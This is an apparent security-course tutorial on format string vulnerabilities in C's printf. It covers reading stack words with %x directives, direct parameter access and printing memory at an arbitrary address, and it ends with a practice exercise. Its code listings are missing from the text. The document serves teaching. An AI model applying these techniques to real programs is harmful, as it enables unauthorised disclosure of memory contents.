Format strings

We now study another classic program exploitation technique. A format string is a string containing format directives such as %d and %s in printf. These directives are interpreted and substituted with appropriate values. For example:

substitutes %d with the value of integer variable r and prints the resulting string.

A classic mistake is to directly print a string s without specifying a format. A string, in fact, should always be printed as follows:

Consider instead the following piece of code.

Notice that string buffer is printed directly, without specifying a format "%s". The problem is that we can now give, as input, strings containing format directives and these will be interpreted. We show some examples.

First notice that the compiler rises a warning regarding the direct printf of a string.

What is happening exactly? The printf in the program interprets %08x as a format directive and prints (as hexadecimal) the first parameter of printf, padded with zeros up to 8 digits. The problem is that there are no parameters! The printf looks for the first parameter on the top of the stack of the calling function, since parameters are pushed on the stack just before calling a function as depicted below:

saved ebp (calling function)
return address (calling function)
first parameter
second parameter
….

So, if we go on adding format directives we can print the whole stack of the calling function. Since the string we are printing is also in the stack (where buffer is), if we print enough words we will soon or later find it. A trick to immediately see the string is to prepend an easy to see pattern such as ‘AAAA’ (41414141 in hexadecimal). Let us try it.

It is easy to see that 41414141 word which is the beginning of our string.

Direct access to parameters

Once we know the position on the stack (in this case it is the seventh word on the stack) we can refer directly to the corresponding parameter as follows:

The format %7$08x is like %08x but instead of printing the next parameter on the stack it prints the one specified before the dollar symbol, the seventh in this case. We can also print the same parameter more than once:

Printing arbitrary memory locations

Now that we know where our string is located on the stack we can do more. The format directive %s is used to print strings: the corresponding parameter on the stack is interpreted as the string address and the pointed string is consequently printed (the ponter is dereferenced!). This allows us for printing a string at an arbitrary memory location: we substitute AAAA with our target address and we place a %s in the format string in the place corresponding to 41414141 in the output. This will interpret our address as a pointer to the string and will print the string starting at such an address.

Exercise

Consider the following program and try to print the supersecret string using the technique discussed above.

Notice that the string is NOT on the stack, thus it would never be printed by increasing the number of %x directives in the format string.

Hint: You can use objdump -D and/or gdb to find the string address.

The following video illustrates the solution (try yourself before watching this):

Further reading

If you are interested in how format string vulnerabilities can be exploited to modify data in memory you can have a look here.

Leave a Reply

Your email address will not be published. Required fields are marked *